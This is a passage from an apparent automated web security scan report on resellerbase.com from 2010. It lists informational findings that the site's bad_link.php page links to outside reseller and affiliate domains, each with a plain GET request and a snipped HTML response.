User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:59:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.nemproduction.com/?id=26660"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.33. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=16

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://worldkom.net/reseller

Request

GET /bad_link.php?id=16 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:06:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://worldkom.net/reseller"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.34. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=42

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.rivcash.com/?rcid=1281

Request

GET /bad_link.php?id=42 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/rivcash-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.rivcash.com/?rcid=1281"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.35. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=8

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.hostcentric.com/join/index.bml?AffID=570113&LinkName=ResellerBase

Request

GET /bad_link.php?id=8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/hostcentric-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:08:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.hostcentric.com/join/index.bml?AffID=570113&LinkName=ResellerBase"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.36. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=23

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.pinnaclecart.com/affiliate/idevaffiliate.php?id=156

Request

GET /bad_link.php?id=23 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.pinnaclecart.com/affiliate/idevaffiliate.php?id=156"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.37. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=9

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://partners.netapplications.com/default.aspx?affid=1640669
http://validator.w3.org/check?uri=referer

Request

GET /bad_link.php?id=9 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:08:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://partners.netapplications.com/default.aspx?affid=1640669"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.38. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=17

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.resellerclub.com/

Request

GET /bad_link.php?id=17 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.resellerclub.com"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.39. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=26

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.sitesinstantly.com/?bid=3617

Request

GET /bad_link.php?id=26 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:59:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.sitesinstantly.com/?bid=3617"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.40. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=41

The response contains the following links to other domains:

http://af.nudistfriends.com/i/af6025460
http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /bad_link.php?id=41 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/nudistfriends-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://af.NudistFriends.com/i/af6025460"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.41. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=5

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.myresellerpanel.com/

Request

GET /bad_link.php?id=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/myresellerpanel-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:08:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.myresellerpanel.com"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.42. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=32

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.6-chats.com/ELT

Request

GET /bad_link.php?id=32 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:59:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.6-chats.com/ELT"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.43. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=46

The response contains the following links to other domains:

http://hubshout.com/
http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /bad_link.php?id=46 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://hubshout.com"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.44. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=40

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
https://secure.videosecrets.com/signup.php?mp_referrer=k2ke

Request

GET /bad_link.php?id=40 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/videosecrets-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10056

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="https://secure.videosecrets.com/signup.php?mp_referrer=k2ke"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.45. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=4

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://reseller.targetdomain.com/
http://validator.w3.org/check?uri=referer

Request

GET /bad_link.php?id=4 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10010

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://reseller.targetdomain.com"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.46. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=44

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.micrositez.co.uk/white-label-seo-reseller-seo.html

Request

GET /bad_link.php?id=44 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:08:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10098

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.micrositez.co.uk/white-label-seo-reseller-seo.html"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.47. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=35

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.awempire.com/ws/referral_rs=reseller/wsmain2.php

Request

GET /bad_link.php?id=35 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/awempire-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10052

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.awempire.com/ws/referral_rs=reseller/wsmain2.php"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.48. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=33

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.love-money.de/?id=26660

Request

GET /bad_link.php?id=33 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:59:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.love-money.de/?id=26660"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.49. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=29

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.mediaplazza.com/sysMaster.php?a=movil24

Request

GET /bad_link.php?id=29 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
